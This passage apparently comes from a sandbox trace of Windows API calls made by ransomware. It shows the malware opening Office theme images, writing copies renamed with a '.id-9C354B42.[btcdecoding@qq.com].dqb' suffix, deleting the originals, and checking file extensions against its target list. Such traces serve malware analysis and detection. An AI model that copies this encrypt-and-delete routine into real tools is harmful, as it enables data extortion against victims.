shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.989] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=34916) returned 1 [0042.989] CloseHandle (hObject=0x174) returned 1 [0042.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 0x20 [0042.989] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.990] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.990] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0042.990] GetLastError () returned 0x0 [0042.990] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x8864, lpOverlapped=0x0) returned 1 [0042.992] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x8870, lpOverlapped=0x0) returned 1 [0042.993] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0042.993] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0042.993] SetEndOfFile (hFile=0x1a4) returned 1 [0042.993] CloseHandle (hObject=0x1a4) returned 1 [0042.993] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.993] SetEndOfFile (hFile=0x174) returned 1 [0042.994] CloseHandle (hObject=0x174) returned 1 [0042.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0042.995] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1 [0042.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.995] lstrlenW (lpString=".doc") returned 4 [0042.995] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0042.995] lstrlenW (lpString=".docx") returned 5 [0042.995] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0042.995] lstrlenW (lpString=".pdf") returned 4 [0042.995] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0042.995] lstrlenW (lpString=".xls") returned 4 [0042.995] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0042.995] lstrlenW (lpString=".xlsx") returned 5 [0042.995] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0042.995] lstrlenW (lpString=".ppt") returned 4 [0042.995] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0042.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.995] lstrlenW (lpString=".zip") returned 4 [0042.995] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0042.995] lstrlenW (lpString=".rar") returned 4 [0042.995] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0042.995] lstrlenW (lpString=".bz2") returned 4 [0042.995] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0042.995] lstrlenW (lpString=".7z") returned 3 [0042.995] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0042.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.995] lstrlenW (lpString=".dbf") returned 4 [0042.996] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.996] lstrlenW (lpString=".1cd") returned 4 [0042.996] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.996] lstrlenW (lpString=".jpg") returned 4 [0042.996] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.996] lstrlenW (lpString=".doc") returned 4 [0042.996] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString=".docx") returned 5 [0042.996] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0042.996] lstrlenW (lpString=".pdf") returned 4 [0042.996] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString=".xls") returned 4 [0042.996] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0042.996] lstrlenW (lpString=".xlsx") returned 5 [0042.996] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0042.996] lstrlenW (lpString=".ppt") returned 4 [0042.996] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.996] lstrlenW (lpString=".zip") returned 4 [0042.996] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0042.996] lstrlenW (lpString=".rar") returned 4 [0042.996] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0042.996] lstrlenW (lpString=".bz2") returned 4 [0042.996] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString=".7z") returned 3 [0042.996] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.996] lstrlenW (lpString=".dbf") returned 4 [0042.996] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0042.996] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.997] lstrlenW (lpString=".1cd") returned 4 [0042.997] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0042.997] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0042.997] lstrlenW (lpString=".jpg") returned 4 [0042.997] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0042.997] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0042.997] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0042.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.998] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=2181) returned 1 [0042.998] CloseHandle (hObject=0x174) returned 1 [0042.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 0x20 [0042.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0042.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.998] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.998] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0042.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0043.000] GetLastError () returned 0x0 [0043.000] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x885, lpOverlapped=0x0) returned 1 [0043.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x890, lpOverlapped=0x0) returned 1 [0043.002] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.002] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.002] SetEndOfFile (hFile=0x1a4) returned 1 [0043.002] CloseHandle (hObject=0x1a4) returned 1 [0043.003] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.003] SetEndOfFile (hFile=0x174) returned 1 [0043.003] CloseHandle (hObject=0x174) returned 1 [0043.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.004] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif")) returned 1 [0043.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.004] lstrlenW (lpString=".doc") returned 4 [0043.004] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.004] lstrlenW (lpString=".docx") returned 5 [0043.004] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.004] lstrlenW (lpString=".pdf") returned 4 [0043.004] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.004] lstrlenW (lpString=".xls") returned 4 [0043.004] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.004] lstrlenW (lpString=".xlsx") returned 5 [0043.004] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.004] lstrlenW (lpString=".ppt") returned 4 [0043.004] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.004] lstrlenW (lpString=".zip") returned 4 [0043.004] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.004] lstrlenW (lpString=".rar") returned 4 [0043.004] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.004] lstrlenW (lpString=".bz2") returned 4 [0043.004] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.004] lstrlenW (lpString=".7z") returned 3 [0043.004] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.004] lstrlenW (lpString=".dbf") returned 4 [0043.004] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString=".1cd") returned 4 [0043.005] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString=".jpg") returned 4 [0043.005] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString=".doc") returned 4 [0043.005] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.005] lstrlenW (lpString=".docx") returned 5 [0043.005] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.005] lstrlenW (lpString=".pdf") returned 4 [0043.005] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.005] lstrlenW (lpString=".xls") returned 4 [0043.005] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.005] lstrlenW (lpString=".xlsx") returned 5 [0043.005] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.005] lstrlenW (lpString=".ppt") returned 4 [0043.005] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString=".zip") returned 4 [0043.005] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.005] lstrlenW (lpString=".rar") returned 4 [0043.005] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.005] lstrlenW (lpString=".bz2") returned 4 [0043.005] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.005] lstrlenW (lpString=".7z") returned 3 [0043.005] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString=".dbf") returned 4 [0043.005] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.005] lstrlenW (lpString=".1cd") returned 4 [0043.006] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 74 [0043.006] lstrlenW (lpString=".jpg") returned 4 [0043.006] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.006] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.006] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.007] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=20627) returned 1 [0043.007] CloseHandle (hObject=0x174) returned 1 [0043.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 0x20 [0043.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.007] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.007] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.007] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.007] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0043.007] GetLastError () returned 0x0 [0043.007] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5093, lpOverlapped=0x0) returned 1 [0043.011] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x50a0, lpOverlapped=0x0) returned 1 [0043.012] ReadFile (in: hFile=0x174, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0043.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.012] SetEndOfFile (hFile=0x1a4) returned 1 [0043.012] CloseHandle (hObject=0x1a4) returned 1 [0043.012] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0043.012] SetEndOfFile (hFile=0x174) returned 1 [0043.013] CloseHandle (hObject=0x174) returned 1 [0043.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.013] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png")) returned 1 [0043.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.013] lstrlenW (lpString=".doc") returned 4 [0043.013] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.013] lstrlenW (lpString=".docx") returned 5 [0043.014] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.014] lstrlenW (lpString=".pdf") returned 4 [0043.014] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.014] lstrlenW (lpString=".xls") returned 4 [0043.014] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.014] lstrlenW (lpString=".xlsx") returned 5 [0043.014] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.014] lstrlenW (lpString=".ppt") returned 4 [0043.014] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.014] lstrlenW (lpString=".zip") returned 4 [0043.014] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.014] lstrlenW (lpString=".rar") returned 4 [0043.014] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.014] lstrlenW (lpString=".bz2") returned 4 [0043.014] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.014] lstrlenW (lpString=".7z") returned 3 [0043.014] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.014] lstrlenW (lpString=".dbf") returned 4 [0043.014] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.014] lstrlenW (lpString=".1cd") returned 4 [0043.014] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.014] lstrlenW (lpString=".jpg") returned 4 [0043.014] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.014] lstrlenW (lpString=".doc") returned 4 [0043.014] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.014] lstrlenW (lpString=".docx") returned 5 [0043.014] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.014] lstrlenW (lpString=".pdf") returned 4 [0043.014] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.015] lstrlenW (lpString=".xls") returned 4 [0043.015] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.015] lstrlenW (lpString=".xlsx") returned 5 [0043.015] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.015] lstrlenW (lpString=".ppt") returned 4 [0043.015] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.015] lstrlenW (lpString=".zip") returned 4 [0043.015] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.015] lstrlenW (lpString=".rar") returned 4 [0043.015] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.015] lstrlenW (lpString=".bz2") returned 4 [0043.015] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.015] lstrlenW (lpString=".7z") returned 3 [0043.015] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.015] lstrlenW (lpString=".dbf") returned 4 [0043.015] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.015] lstrlenW (lpString=".1cd") returned 4 [0043.015] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 75 [0043.015] lstrlenW (lpString=".jpg") returned 4 [0043.015] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.015] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.015] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 